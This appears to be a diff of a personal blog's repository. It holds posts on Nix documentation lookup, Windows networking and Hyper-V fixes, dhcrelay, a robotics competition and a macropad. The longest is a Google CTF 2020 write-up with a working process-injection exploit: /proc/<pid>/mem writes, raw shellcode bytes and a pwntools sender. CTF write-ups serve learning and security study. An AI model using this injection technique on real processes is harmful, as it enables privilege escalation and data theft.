abstract syntax tree, so for functions that are used many times, the definition
will get buried among the uses. This is not ideal.

I believe that in the case of `nix-doc` it may have found the function but
ignored it since it had no documentation. Let's test that.

<details>
<summary>Results of adding a comment to see what happens</summary>
<pre class="language-text"><code>
<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> nix-doc disableLibraryProfiling
disable library profiling
<font color="#FFFFFF"><b>disableLibraryProfiling</b></font> = drv: ...
# ./pkgs/development/haskell-modules/lib.nix:178
</code></pre>
</details>

Yep.

Well, time to pull out the dynamic analysis again. As in the [simple
case](#simple), you can get the source location with
`builtins.unsafeGetAttrPos` or the functions added by `nix-doc`. On my system's
nixpkgs, where there is no documentation comment for the function, this is what
I get:

<pre class="language-text"><code>
nix-repl> builtins.doc n.haskell.lib.disableLibraryProfiling

<font color="#FFFFFF"><b>func</b></font> = drv: ...
# /nix/store/...-nixpkgs-.../nixpkgs/pkgs/development/haskell-modules/lib.nix:177
</code></pre>

Although there is no documentation, `nix-doc` has pulled out the signature,
which may already be enough to guess what the function does. If not, there is a
source code reference.

## Indirection

The hardest class of functions to find documentation for is those that are
wrapped by some other function. These can be frustrating, since the AST pattern
matching for functions used by `nix-doc` and `manix` falls apart on them.

An example of such a function is `nixpkgs.fetchFromGitLab`, but any package
created via `callPackage` behaves the same way: these are not really functions,
yet you still want to find their definitions.

`manix` knows of the function, but does not know from whence it came, whereas
`nix-doc`'s CLI does not see it at all:

<pre class="language-text"><code>
<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> manix fetchFromGitLab
<b>Here's what I found in nixpkgs:</b> <font color="#D0CFCC">pkgsMusl.fetchFromGitLab</font>
<font color="#D0CFCC">fetchFromGitLab</font> <font color="#D0CFCC">fetchFromGitLab.override</font>
<font color="#D0CFCC">fetchFromGitLab.__functor</font> <font color="#D0CFCC">fetchFromGitLab.__functionArgs</font>
<font color="#D0CFCC">pkgsHostTarget.fetchFromGitLab</font> <font color="#D0CFCC">pkgsBuildBuild.fetchFromGitLab</font>
<font color="#D0CFCC">pkgsStatic.fetchFromGitLab</font> <font color="#D0CFCC">pkgsTargetTarget.fetchFromGitLab</font>
<font color="#D0CFCC">targetPackages.fetchFromGitLab</font> <font color="#D0CFCC">gitAndTools.fetchFromGitLab</font>
<font color="#D0CFCC">__splicedPackages.fetchFromGitLab</font> <font color="#D0CFCC">buildPackages.fetchFromGitLab</font>
<font color="#D0CFCC">pkgsHostHost.fetchFromGitLab</font> <font color="#D0CFCC">pkgsBuildHost.fetchFromGitLab</font>
<font color="#D0CFCC">pkgsBuildTarget.fetchFromGitLab</font> <font color="#D0CFCC">pkgsi686Linux.fetchFromGitLab</font>


<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> nix-doc fetchFromGitLab
</code></pre>

Time to get out the dynamic analysis again!

<pre class="language-text"><code>
nix-repl> n = import <nixpkgs> {}

nix-repl> builtins.doc n.fetchFromGitLab
<font color="#C01C28"><b>error:</b></font> <b>(string)</b>:1:1: value is a set while a lambda was expected

nix-repl> builtins.typeOf n.fetchFromGitLab
<font color="#A2734C">"set"</font>

nix-repl> n.fetchFromGitLab
{ __functionArgs = { ... }; __functor = <font color="#12488B"><b>«lambda @ /nix/store/...-nixpkgs-.../nixpkgs/lib/trivial.nix</b></font>:324:19»; override = { ... }; }
</code></pre>

That didn't work! It's a set with the `__functor` attribute, which makes it
callable.
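
For intuition, here is an analogy (in Python, not Nix): `__functor` works much
like Python's `__call__`, an attribute that lets a non-function value be
applied like a function, which is exactly why the value passes `callable`-style
checks but fails anything expecting a real lambda. A sketch of the analogy
(the `CallableSet` class is hypothetical, purely illustrative):

```python
import types

class CallableSet:
    """Rough analogue of a Nix attrset carrying a __functor attribute."""
    def __init__(self, function_args):
        self.function_args = function_args  # plays the role of __functionArgs

    def __call__(self, x):                  # plays the role of __functor
        return x * 2

fetcher = CallableSet({"owner": True, "repo": True})
assert callable(fetcher)                            # applies like a function...
assert not isinstance(fetcher, types.FunctionType)  # ...but is not a lambda
assert fetcher(21) == 42
```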

Even if we try pointing `nix-doc` at the `__functor`, it will tell us about
`setFunctionArgs`, which is not what we were looking for.

From what I understand of the Nix internals from writing the plugin, there is
no nice way to get the source of a function wrapped like this: the information
is already lost by the time the value enters the dumping function. Nix only
stores lambda and attribute *definition* locations, so once you have taken the
value of the attribute, that information is no longer available.

This could be resolved with a new REPL command, since REPL commands take
strings of source that could be split to get the attribute name and attribute
set. However, custom REPL commands are not supported, so some modification
would have to be made to Nix itself to add this feature.

Therefore, I have to use the last trick up my sleeve, `unsafeGetAttrPos`, to
find the definition of the attribute:

<pre class="language-text"><code>
nix-repl> builtins.unsafeGetAttrPos "fetchFromGitLab" n
{ column = <font color="#2AA1B3">3</font>; file = <font color="#A2734C">"/nix/store/...-nixpkgs-.../nixpkgs/pkgs/top-level/all-packages.nix"</font>; line = <font color="#2AA1B3">466</font>; }
</code></pre>

This tells me, albeit in an annoying-to-copy format, that the next breadcrumb
is at `pkgs/top-level/all-packages.nix:466`, which is

```nix
fetchFromGitLab = callPackage ../build-support/fetchgitlab {};
```

Then, I can look in `pkgs/build-support/fetchgitlab` and find a `default.nix`,
which will have the definition I want.
301 content/posts/gctf-2020-writeonly.md Normal file

+++
date = "2020-08-23"
draft = false
path = "/blog/gctf-2020-writeonly"
tags = ["ctf", "security"]
title = "Google CTF 2020: writeonly"
+++

I participated in the 2020 Google CTF on the UBC CTF team [Maple
Bacon](https://ubcctf.github.io/). Without their help, I would probably have
given up out of frustration. Special thanks to Robert and Filip, who put up
with my many questions and swearing at the computer.

[All the files for my solution are available on my
GitHub](https://github.com/lf-/ctf/tree/main/writeonly).

I chose to do this challenge because nobody else on my team was working on it
and it looked fairly approachable, after I got frustrated with the assembly in
the reversing challenge `beginner`. Unfortunately, my assumption that I
wouldn't have to do assembly in this one was completely false, but I tricked
myself for long enough to have a proper go at it anyway.

The challenge gives this description:

> This sandbox executes any shellcode you send. But thanks to seccomp, you
> won't be able to read /home/user/flag.

What this means in practice is that there is a seccomp filter with an
allow-list of system calls that does not include `read`. However, as suggested
by the challenge name, `write` and `open` *are* allowed. This can be abused.

## Shellcode in C and scaffolding

The challenge loads whatever you send it into a flat read-write-execute page.

I wanted to write my shellcode in C because, as mentioned, I didn't want to
write assembly! So, I endeavored to figure out how to make that happen. This
took more time than the challenge itself, but yak shaving is my specialty. I
looked around on the internet for options and found
[SheLLVM](https://github.com/SheLLVM/SheLLVM), which I couldn't figure out how
to use, [ShellcodeCompiler](https://github.com/NytroRST/ShellcodeCompiler),
which doesn't support variables, and [Binary Ninja
`scc`](https://scc.binary.ninja/index.html), which I don't have a license for.

As such, I tried to find prior art on Just Using a Normal Compiler. I found [a
good blog post](https://modexp.wordpress.com/2019/04/24/glibc-shellcode/#compile)
with lots of details, but it was clearly trying to hack around properties of
how executables are linked (and I also couldn't reproduce its string usage
successfully, even with `-O0`).

The specific usage of this shellcode has a lot in common with microcontrollers
and other embedded platforms, in that the executable is loaded into memory and
executed immediately. Eventually this led to messing about with linker scripts
and staring at both the `binutils` documentation and various linker scripts for
bare-metal platforms.

I ended up writing the following linker script to ensure that all the functions
were laid out as expected, annotating my `_start` function with
`__attribute__((section(".text.prologue")))` to make sure it gets put on top.
It also stuffs the `.rodata` section into `.text` to simplify the binary layout
(I'm unsure if this is actually necessary).

```
ENTRY(_start);

SECTIONS
{
    . = ALIGN(16);
    .text :
    {
        *(.text.prologue)
        *(.text)
        *(.rodata)
    }
    .data :
    {
        *(.data)
    }

    /DISCARD/ :
    {
        *(.interp)
        *(.comment)
    }
}
```

Once the ELF is built (having this intermediate form is critical for debugging,
so I can find addresses of things and have symbols while reading the output
assembly), it is `objcopy`'d with `-O binary` to emit the final shellcode
binary that can be loaded directly into memory and executed.

## The path to privilege escalation

Auditing the code for the challenge, I found that it forks a second process
prior to dropping privileges, which runs a function, `check_flag`, in an
infinite loop, checking the validity of the flag. This seemed pretty
suspicious, since there is no reason to overwrite the flag (doing so would lose
the flag).

```c
pid_t pid = check(fork(), "fork");
if (!pid) {
    while (1) {
        check_flag();
    }
    return 0;
}

// ⬇ this is suspicious!!
printf("[DEBUG] child pid: %d\n", pid);
void_fn sc = read_shellcode();
setup_seccomp();
sc();
```

My path to the solution started with poking around procfs to see what could be
abused. I struggled with `/proc/$pid/stack`, which appears to often be
inaccessible. I also initially failed to figure out how `/proc/$pid/mem`
worked, and assumed that it did not work, based on seeing an I/O error.

As it turns out, this `mem` virtual file is basically the entire memory mapping
of the process as a file: you can `lseek` to any point in it and use `write` to
poke it. This sounded like it could enable execution to be taken over given
`write(2)` on it, so it was what I went with.
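
The access pattern is plain file I/O; a minimal sketch (the `poke` helper is
hypothetical, and actually writing to another process's `/proc/$pid/mem`
additionally requires ptrace permission, so ordinary files are the easiest way
to see the mechanics):

```python
import os

def poke(path: str, offset: int, data: bytes) -> None:
    """Seek to `offset` in `path` and overwrite the bytes there; against
    /proc/<pid>/mem, `offset` is a virtual address in the target process."""
    fd = os.open(path, os.O_RDWR)
    try:
        os.lseek(fd, offset, os.SEEK_SET)
        os.write(fd, data)
    finally:
        os.close(fd)
```

The exploit performs this same `open`/`lseek`/`write` sequence with raw
syscalls from C.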

## Failed ROP attempt

Initially, I falsely assumed that writes to `mem` follow the mappings' access
permissions; I found out later from someone on my team that this was not true.
So, I started out trying to write a Return Oriented Programming (ROP) chain to
take control of execution.

I used `ropper` to find gadgets to set up the registers to `syscall`
`execve("/bin/cat", "/home/user/flag", NULL)`. I then overwrote the stack to
try to get execution to go to my `execve(2)` after the return from
`nanosleep(2)`, assuming this would be fairly reliable since the process spends
most of its time in that syscall. This got close to working, but after taking a
break to sleep, I was informed that `/proc/$pid/mem` actually can change
read-only memory regions, so I changed my approach to simply overwrite the
process's `.text` section with some shellcode.

## The exploit

High level overview:

- `fd = open("/proc/$childPid/mem", O_RDWR)`
- `lseek(fd, injectPos, SEEK_SET)`
- `write(fd, evilCode, sizeof (evilCode))`

Now that I have the pieces together and can execute C in-process, it's time to
write an exploit. One of the first things I have to contend with is
constructing a path to `/proc/$pid/mem`. Well, I can't `getpid()` due to the
syscall filter, and it wouldn't even help to find the child PID. This was the
first challenge. I read the disassembly of the `main` function to try to find
the PID, since it would have been returned from `fork` and it is logged by the
suspicious `printf`. As it turned out, it was indeed on the stack, so I wrote
some evil inline assembly to get the value pointed to by `rbp - 0x4`.

The next step was to construct the path. I was unsure of the availability of C
string and `itoa`-like functions in the environment, given that there is no
standard library present, so I just wrote some. An interesting optimization,
nicked from [later rewriting the exploit in
Rust](https://lfcode.ca/blog/writeonly-in-rust), is that my `itoa` goes
backwards, writing into a buffer pre-filled with extra slashes that will be
ignored by the OS. This cut my executable size about in half by not having to
reverse the string or perform string copies as one would in a normal `itoa`.

```c
int pid;
// well, we weren't allowed getpid so,
// steal the pid from the caller's stack
__asm__ __volatile__ (
    "mov %0, dword ptr [rbp - 0x4]\n"
    : "=r"(pid) ::);
char pathbuf[64] = "/proc////////////mem";
itoa_badly(pid, &pathbuf[15]);
```
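
The backwards-`itoa` trick is easy to model; here is a hypothetical Python
sketch of what an `itoa_badly` does (the real C version takes a pointer rather
than an index, but the digit placement is the same):

```python
def itoa_badly(n: int, buf: bytearray, end: int) -> None:
    """Write n's decimal digits so the last digit lands at buf[end],
    growing leftwards over the slash padding -- no reversal, no copies."""
    i = end
    while True:
        buf[i] = ord('0') + n % 10
        n //= 10
        i -= 1
        if n == 0:
            break

# same layout as the C buffer: "/proc////////////mem" (12 padding slashes)
path = bytearray(b"/proc" + b"/" * 12 + b"mem")
itoa_badly(1234, path, 15)
# the result is "/proc///////1234/mem"; the kernel's path resolution
# collapses the repeated slashes, so this opens /proc/1234/mem
```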

Syscalls were performed with more inline assembly, this time lifted directly
from the musl sources. Part of my motivation for not using a libc, besides
binary size, is that libc requires a bunch more sections to be present in my
binary, and I did not want to have to research how to deal with those.
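
For a feel of what those thin wrappers do: a raw syscall is just a dispatch by
number with the arguments in registers. On Linux you can make the same call
through libc's `syscall(2)` entry point, e.g. from Python (the number 39 is the
x86-64 Linux `getpid` syscall; this sketch assumes a Linux host):

```python
import ctypes
import os

libc = ctypes.CDLL(None, use_errno=True)  # the process's own libc

SYS_getpid = 39  # x86-64 Linux syscall number for getpid(2)

# libc.syscall(number, args...) dispatches the raw syscall, which is what
# the hand-rolled asm stubs do directly when no libc is present
assert libc.syscall(SYS_getpid) == os.getpid()
```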

I chose to inject my stage 2 shellcode right at the point where the loop in
`check_flag` would jump back to the beginning, as it is a position where it
will likely work most of the time.

The stage 2 shellcode was generated with pwntools `shellcraft`. It was fairly
trivial.

```c
int fd = syscall2(SYS_open, (uint64_t)(void *)pathbuf, O_RDWR);

/* disassemble check_flag
 * (...)
 * 0x00000000004022d9 <+167>: mov edi,0x1
 * 0x00000000004022de <+172>: call 0x44f2e0 <sleep>
 * 0x00000000004022e3 <+177>: jmp 0x40223a <check_flag+8>
 */
void *tgt = (void *)0x4022e3;
syscall3(SYS_lseek, fd, (uint64_t)tgt, SEEK_SET);

//////////////////////////////////////////////////////////////
// Now, just write shellcode into memory at the injection point.
/*
 * In [4]: sh = shellcraft.amd64.cat('/home/user/flag', 1) + shellcraft.amd64.infloop()
 * In [5]: print(sh)
 * / * push b'/home/user/flag\x00' * /
 * mov rax, 0x101010101010101
 * push rax
 * mov rax, 0x101010101010101 ^ 0x67616c662f7265
 * xor [rsp], rax
 * mov rax, 0x73752f656d6f682f
 * push rax
 * / * call open('rsp', 'O_RDONLY', 0) * /
 * push SYS_open / * 2 * /
 * pop rax
 * mov rdi, rsp
 * xor esi, esi / * O_RDONLY * /
 * cdq / * rdx=0 * /
 * syscall
 * / * call sendfile(1, 'rax', 0, 2147483647) * /
 * mov r10d, 0x7fffffff
 * mov rsi, rax
 * push SYS_sendfile / * 0x28 * /
 * pop rax
 * push 1
 * pop rdi
 * cdq / * rdx=0 * /
 * syscall
 * jmp $
 * In [7]: [hex(x) for x in asm(sh)]
 */
char evil[] = {0x48, 0xb8, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x50,
    0x48, 0xb8, 0x64, 0x73, 0x2e, 0x67, 0x6d, 0x60, 0x66, 0x1, 0x48, 0x31,
    0x4, 0x24, 0x48, 0xb8, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x75, 0x73,
    0x50, 0x6a, 0x2, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x99, 0xf, 0x5,
    0x41, 0xba, 0xff, 0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28,
    0x58, 0x6a, 0x1, 0x5f, 0x99, 0xf, 0x5, 0xeb, 0xfe};

syscall3(SYS_write, fd, (uint64_t)(void *)evil, sizeof (evil));
```
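
One detail worth noting in the shellcraft listing: the second qword of the
pushed path is XOR-masked with `0x0101010101010101` so that the string's
trailing NUL doesn't place a zero byte in the instruction stream (a common
shellcode constraint), and `xor [rsp], rax` undoes the mask at runtime. A quick
Python check of that encoding, using the constants from the listing above:

```python
# second 8 bytes of b"/home/user/flag\x00", as pushed by the stub
tail = b"er/flag\x00"
mask = 0x0101010101010101

encoded = int.from_bytes(tail, "little") ^ mask
# the masked immediate contains no zero bytes...
assert 0 not in encoded.to_bytes(8, "little")
# ...and XOR-ing with the mask again recovers the original path bytes
assert (encoded ^ mask).to_bytes(8, "little") == tail
```

The encoded bytes are exactly the `0x64, 0x73, 0x2e, ...` run visible near the
start of the `evil[]` array.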

I sent it with a simple pwntools script:

```python
import os
import sys
from pwn import *

f = sys.argv[1]
fd = open(f, 'rb')
stat = os.stat(f)
sz = stat.st_size

io = remote('writeonly.2020.ctfcompetition.com', 1337)

# for `make serve`
# io = remote('localhost', 8000)

# you can gdb into the parent before we send malicious code
input()
io.sendline(str(sz))
io.send(fd.read())
io.interactive()
```

Then, the exciting moment:

```
ctf/writeonly » make send
python send.py shellcode.bin
[+] Opening connection to writeonly.2020.ctfcompetition.com on port 1337: Done

[*] Switching to interactive mode
[DEBUG] child pid: 2
shellcode length? reading 576 bytes of shellcode. CTF{why_read_when_you_can_write}
$
```

## Learnings

Many. The one thing I did really right was making it easy to try again. Writing
a Makefile for the various things I needed to run was immensely valuable, so I
didn't have to remember commands.

Late in the process I had a lot of trouble debugging a problem where the
exploit chain would work on local processes but not remotely. It turned out
that I was injecting at a location where, depending on where execution was, it
would sometimes corrupt the state of the checking process; it was fixed by
moving the injection point. However, I initially thought it was ASLR, so I
fought with `gdb` a bunch about that.

Filip suggested that I use `socat TCP-LISTEN:8000,bind=localhost,reuseaddr,fork
EXEC:./chal` to essentially emulate the challenge server locally and debug the
remote process. If the process is not started under `gdb`, it is more likely to
behave reproducibly. This helped a lot in eliminating that as a variable while
debugging.
27 content/posts/general-network-error-54.md Normal file

+++
author = "lf"
categories = ["PowerShell", "Windows Server", "Active Directory"]
date = 2015-05-23T21:48:15Z
description = ""
draft = false
path = "/blog/general-network-error-54"
tags = ["PowerShell", "Windows Server", "Active Directory"]
title = "General Network Error when running Install-ADDSForest"
+++

When I was messing about with AD DS a bit on Windows Server 2016 TP 2, I
encountered the error "General Network Error", with error ID 54. This is
obviously a very unhelpful error. While troubleshooting, I noticed that the VM
was being assigned an address in `169.254.x.x`. This wasn't part of my intended
IP range, so I started investigating.

It turns out that `169.254.x.x` is a range reserved for APIPA (Automatic
Private IP Addressing), whereby an operating system automatically assigns
itself an IP when no DHCP is available (which there wasn't, because I intended
to set up Windows DHCP). After disabling this, the AD setup worked correctly.
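
(As an aside: if you ever need to detect such addresses in a script, the
`169.254.0.0/16` block is well-known enough that, for example, Python's
`ipaddress` module can identify it directly.)

```python
import ipaddress

# APIPA self-assigned addresses come from the link-local block 169.254.0.0/16
addr = ipaddress.IPv4Address("169.254.17.5")
assert addr.is_link_local
assert addr in ipaddress.ip_network("169.254.0.0/16")

# a normal private address is not link-local
assert not ipaddress.IPv4Address("10.0.0.5").is_link_local
```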

You may be wondering how to disable this problematic system. Here's how you do
it (in PowerShell):

```powershell
# Disable DHCP
Get-NetAdapter | Set-NetIPInterface -Dhcp Disabled
# Disable APIPA
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters' -Name IPAutoconfigurationEnabled -Value 0 -Type DWord
# Reboot to apply
Restart-Computer
```
28 content/posts/how-to-have-a-functional-dhcrelay.md Normal file

+++
author = "lf"
categories = ["Windows Server", "dhcp", "linux", "homelab"]
date = 2016-03-05T05:20:54Z
description = ""
draft = false
path = "/blog/how-to-have-a-functional-dhcrelay"
tags = ["Windows Server", "dhcp", "linux", "homelab"]
title = "How to have a functional dhcrelay"
+++
|
||||||
|
I'm dumb. Or ignorant. Or inexperienced. I haven't decided which.
|
||||||
|
|
||||||
|
`dhcrelay` only gets proper responses if it's listening on both the interface that it's actually listening on for requests and the one where it will get the responses.
|
||||||
|
|
||||||
|
My command line for it to forward dhcp requests to my Windows dhcp server in my virtual lab is:
|
||||||
|
|
||||||
|
/usr/bin/dhcrelay -4 -d -i eth1 -i eth2 10.x.x.x
|
||||||
|
|
||||||
|
`eth1` is the interface with the Windows dhcp server on its subnet
|
||||||
|
|
||||||
|
`eth2` is the interface with the clients on it
|
||||||
|
|
||||||
|
`10.x.x.x` is the address of the Windows dhcp server
|
||||||
|
|
||||||
|
This is run on my arch (yes, I know. Debian took longer than Windows to install. The only stuff on it is in `base`, `vim`, and `dhcp`) gateway VM. I could also stand up a Windows box and have it do NAT, but that doesn't use 512MB of RAM nearly as happily.
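To keep the relay running across reboots, the command line above can be wrapped in a systemd unit. This is only a sketch: the unit name and hardening choices are my own additions, and it assumes the same interface names and (elided) server address as above:

```ini
# /etc/systemd/system/dhcrelay.service (hypothetical unit name)
[Unit]
Description=DHCPv4 relay to the Windows DHCP server
After=network-online.target
Wants=network-online.target

[Service]
# -d keeps dhcrelay in the foreground so systemd can supervise it
ExecStart=/usr/bin/dhcrelay -4 -d -i eth1 -i eth2 10.x.x.x
Restart=on-failure

[Install]
WantedBy=multi-user.target
```

It would then be enabled with `systemctl enable --now dhcrelay.service`.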
55
content/posts/hyper-v-manager-throws-obscure-errors.md
Normal file
@@ -0,0 +1,55 @@
+++
author = "lf"
categories = ["hyper-v", "Windows Server", "PowerShell", "Server 2019"]
date = 2018-08-16T03:25:14Z
description = ""
draft = false
path = "/blog/hyper-v-manager-throws-obscure-errors"
tags = ["hyper-v", "Windows Server", "PowerShell", "Server 2019"]
title = "Hyper-V Manager throws obscure errors if the target computer calls itself something else than you do"

+++

I started testing Server 2019 as a Hyper-V host a few days ago, but getting the GUI manager to connect was a bit challenging. This article is as much documentation for me to set this machine up again as it is instructive. <!-- excerpt -->

This machine is not domain joined.

First, name the computer what you want its final DNS name to be with `Rename-Computer`, then reboot, so you will avoid the issue described in the second half of this post.

Second, get a remote shell into it: run `Enable-PSRemoting`, and ensure the firewall rules allow connections from the subnets you're OK with remote connections from, using `Get-NetFirewallRule` piped to `Get-NetFirewallAddressFilter` and `Set-NetFirewallAddressFilter`.

Next, enable CredSSP with `Enable-WSManCredSSP -Role Server` and ensure that the appropriate fresh-credential delegation, trusted hosts, and permit-CredSSP GPOs are applied on the client. Check also that the WinRM service is running on the client, and if there are still issues with lacking "permission to complete this task" while connecting with the manager, also run `Enable-WSManCredSSP` with the client role, delegating to the appropriate host.
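As a sketch of the firewall scoping step, something along these lines can restrict the WinRM rules to a management subnet. The display group name matches the built-in WinRM rules, but the `10.0.0.0/24` subnet is an assumption for illustration; check the rules on your own system first:

```powershell
# Show which remote addresses the WinRM firewall rules currently accept
Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' |
    Get-NetFirewallAddressFilter

# Restrict them to a single management subnet (assumed here to be 10.0.0.0/24)
Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' |
    Get-NetFirewallAddressFilter |
    Set-NetFirewallAddressFilter -RemoteAddress 10.0.0.0/24
```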
Then, hopefully, the Hyper-V manager will just connect.

--------------

Now, for the problem I had, with as many details as feasible so the next person Googling for it will find this post.

The error that appeared was:

> "Hyper-V encountered an error trying to access an object on computer 'LF-HV02' because the object was not found. The object might have been deleted. Verify that the Virtual Machine Management service on the computer is running".

{% image(name="XH8q54D.png") %}
Screenshot of the Hyper-V Manager error dialog showing the message above.
{% end %}

I then investigated the event logs on the target system. In the `WMI-Activity/Operational` log, I found an error with event ID 5858 and result code `0x80041002`:

```
Id = {8FA5E5DB-34E0-0001-31E6-A58FE034D401};
ClientMachine = WIN-QKHK3OGNV1V;
User = WIN-QKHK3OGNV1V\Administrator;
ClientProcessId = 2532;
Component = Unknown;
Operation = Start IWbemServices::GetObject - root\virtualization\v2 : Msvm_VirtualSystemManagementService.CreationClassName="Msvm_VirtualSystemManagementService",Name="vmms",SystemCreationClassName="Msvm_ComputerSystem",SystemName="LF-HV02";
ResultCode = 0x80041002;
PossibleCause = Unknown
```

{% image(name="event5858.png") %}
Screenshot of the event viewer showing the above message.
{% end %}

When poking around at the mentioned CIM object with `Get-CimInstance -ClassName 'Msvm_VirtualSystemManagementService' -Namespace 'root\virtualization\v2'`, I found that the system name was some randomized name starting with `WIN-`. So, I renamed the computer to what it was supposed to be called with `Rename-Computer`, rebooted, and that fixed the issue.
67
content/posts/i-competed-in-skills-canada-robotics.md
Normal file
@@ -0,0 +1,67 @@
+++
author = "lf"
categories = ["3dprinting", "electronics", "school"]
date = 2019-06-13T18:01:00Z
description = ""
draft = false
path = "/blog/i-competed-in-skills-canada-robotics"
tags = ["3dprinting", "electronics", "school"]
title = "I competed in Skills Canada Robotics"
featuredImage = "../images/robotics-header-1.jpg"

+++

Skills Canada hosts a robotics competition for the secondary level every year, with a different task each time. Competitors build remote controlled robots ahead of time which they bring with them to the competition. There is also an autonomous portion of the competition, where we build robots on the competition floor using a set of parts for a challenge which is revealed on competition day.<!-- excerpt -->

Our team achieved first place at the national competition, but we are not continuing to worlds as it is not a worlds-qualifying year (though a former team from my school is!).

{% image(name="robotics-court.jpg") %}
Photo of the robotics court. It is made of wood and divided into two sides. Some robots are visible in it, and there is a substantial crowd surrounding it from the back. Students are visible working in the background.
{% end %}

This is the court we played on, with some other teams on it. It has hills on both sides (themed after the Citadel in Halifax), with ammo boxes full of foam golf balls on top of the hills and on the court floor. The objective is to pick up and deliver these foam golf balls to the other side using a maximum of 2 remote operated robots (autonomous robots can be used in addition to these two, but few teams chose to do this).

Scoring is as follows:

- 1 point for each ball that is delivered onto the court floor of the other side of the court
- 2 points for each ball that is in the nets on the hills at the end of the game
- 3 points for each ball in the nets on the opposing team's robots at the end of the game
- 10 points if all robots with nets end the game on top of the hill as the buzzer sounds

We built two identical robots for the competition, for which we 3D printed almost all of the mechanical parts. The design uses hacked car vacuums to suck the foam golf balls up into a tube, where they are buffered. A rotating valve similar to a ball valve allows balls to flow into the launcher and blocks off suction to the launcher while collecting balls.

To launch the balls, we use a mechanism similar to a pitching machine, which launches balls with two spinning wheels. Balls are pushed into the pitching machine with a server fan.

{% image(name="robotics-internals.jpg") %}
A top view cutaway diagram of the robot internals from a computer aided design program. It shows the path balls travel through the robot: they come in the front then pass a mesh with the vacuum behind it, then a rotating mechanism similar to a ball valve, then there is a straight barrel with opposing wheels that would launch the balls.
{% end %}

On the front of the robots, we built a height adjustment mechanism using a 270-degree servo and a rack and pinion from a Tetrix Max kit we got from the last time we went to Nationals.

## Technical Details

- There is one 12V 5000mAh lithium polymer battery powering everything.
- Motor controllers are a Vantec RDFR22 and a Sabertooth 2x25: the Vantec for our 4 motor drive system, and the Sabertooth for the vacuum and the height adjustment linear actuator. The launcher is handled with an RC relay board which provides on/off control for the fan and motors.
- RC system: we use Jumper T8SG-v2 Plus radios on the FlySky protocol; there is a 10 channel receiver installed, and we use 8 of those channels for controlling the robot. I've used a DigiSpark clone board to extend the servo input range of our nozzle height adjustment servo to get full travel, as well as to output a PWM signal to slow down the server fan (see https://github.com/lf-/ServoExtender).

## Evaluation of techniques used

We made extensive use of various fusion welding techniques on the plastics in this year's design, to varying degrees of success. The launcher was heat staked together very successfully. Friction welding was used to assemble the vacuum and the tube on it, as well as to attach that vacuum and tube assembly to the launcher, also successfully.

We superglued on the fan bracket, which later failed on both robots, one at competition and one in practice. The first one fell off because the robot fell on its back (oops), so I friction welded it back on. The robot fell over again in practice (oops) and broke again, so I heat staked it back on (friction welding is hard to redo over an existing weld). The other one fell off at competition, and I don't think it was because the robot fell over. As it was a glue failure, I friction welded it back on and it was fine for the rest of the day.

Hot glue was used to attach the aiming device, which was generally successful, though airline shipping damage caused us to need to reattach one of them at orientation. Hot glue and velcro have both been used to attach electronics, and I am not satisfied with the results of either on the aluminum buck converters. Further research is required, possibly involving 3D printed backing plates.

## Autonomous competition

The Skills competition had a segment where competitors were to build robots that drive themselves through a maze and drop off plastic spools in a couple of positions on the court.

{% image(name="autonomous-robot.jpg") %}
Photo of a small robot made of aluminum pieces stuck together with screws, sitting on a foam tile. There is a wall used in the course visible in the background. There is indistinct handwriting visible on the front of the robot. The robot has a controller circuit board on the top of it and two servo motors on the front with arms attached to them. Near the arms, there are brightly coloured spools as would be used for thread for sewing.
{% end %}

We built the simplest and smallest possible frame we could think of, using staggered motors to make it narrower.

The spools were managed by two servos with arms holding pins inside the spools. When a spool is to be dropped, the arm with the pin is simply lifted and the spool deposited.

Our team was the only team to build a significant piece of software ahead of the competition (which you are allowed to do). Specifically, I wrote a system that allows the autonomous robot to be manually driven into each desired position and the motor encoder counts measured. These counts are dumped to the serial port, and they can then simply be pasted into the program to drive automatically. This turned a 2 day programming task into a 2 hour driving task.
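The record-and-replay idea can be sketched in a few lines. This is an illustrative Python model rather than the actual Arduino firmware; the function names and the simple "drive until the recorded count is reached" loop are my own simplification of the approach described above:

```python
# Teach-and-repeat sketch: record encoder counts at each taught waypoint,
# then replay by driving until each recorded count is reached.

def record_waypoints(manual_counts):
    """During teaching, snapshot the encoder count at each desired position."""
    # In the real system these were printed to the serial port and
    # pasted into the autonomous program by hand.
    return list(manual_counts)

def replay(waypoints):
    """Replay taught waypoints on a simulated robot with one encoder."""
    count = 0
    visited = []
    for target in waypoints:
        # Drive forward one encoder tick at a time until the target is reached.
        while count < target:
            count += 1  # stand-in for "motors on, encoder accumulating ticks"
        visited.append(count)
    return visited

taught = record_waypoints([120, 450, 900])
print(replay(taught))  # → [120, 450, 900]
```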
More photos of the robots and of the internal mechanisms, with an emphasis on the 3D printing, are available from [https://imgur.com/a/de6Y6zK](https://imgur.com/a/de6Y6zK).
@@ -0,0 +1,110 @@
+++
author = "lf"
categories = ["electronics", "firmware", "mechanical", "keyboards", "qmk"]
date = 2019-03-07T07:15:38Z
description = ""
draft = false
image = "/blog/content/images/2019/03/macropad-in-hand-small.jpg"
path = "/blog/i-designed-and-built-a-mechanical-macropad-numpad"
tags = ["electronics", "firmware", "mechanical"]
title = "I designed and built a mechanical macropad/numpad!"
featuredImage = "../images/macropad-in-hand-small-1.jpg"

+++

More images are available at the [imgur gallery documenting this project](https://imgur.com/a/aq9rSBs).

I built a macropad based on an Arduino Leonardo 2 years ago to rectify my Unicomp Model M keyboard lacking media buttons (volume, media, and others). Around June 2018, I further developed that macropad by adding a 3D printed case for it:
<!-- excerpt -->

{% image(name="aeJcTos.jpg") %}
Photo of the old macropad. It's a particularly low quality telephone keypad in a very tall red 3d printed case with lots of visible sharp edges. There are places for four screws at the corners but only two have been installed.
{% end %}

It served me well, but it was always frustrating to have keys not always register when pressed, and I wanted to get a tenkeyless keyboard in order to get more mouse space and place my keyboard more ergonomically.

